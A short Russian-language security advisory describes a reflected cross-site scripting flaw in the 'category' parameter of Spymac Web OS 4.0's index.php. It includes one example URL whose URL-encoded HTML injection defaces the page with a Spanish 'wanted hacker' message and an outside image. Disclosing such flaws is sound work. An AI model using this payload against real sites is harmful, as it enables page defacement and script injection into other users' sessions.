Программа: Spymac Web OS 4.0
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Уязвимость существует при обработке входных данных в параметре 'category' сценария index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
http://[target]/index.php?category=1%22%3E%3Cbody%3E%3 Ch1%3ESe%20busca%20H4x0r%3C/h1%3E%3Cp%3E%20e
s%20peligroso%20y%20va%20armado%3Cbr%3E%20Lleva% 20un%20portatil%20y%20un%20palm%20en%20las%20manos
%3Cbr%3E%20si%20le%20ven%20;%20no%20le%20proporc
ionen%20conexion%20a%20internet.%3C/p%3E%3Cp%3E%3 C/p%3E3Cimg20src=http://www.ttvn.com.vn/Uploaded/administ
rator/hacker.jpg%3E%3Ch1%3EBy%20Lostmon%3C/h1%3E% 3C/body%3E
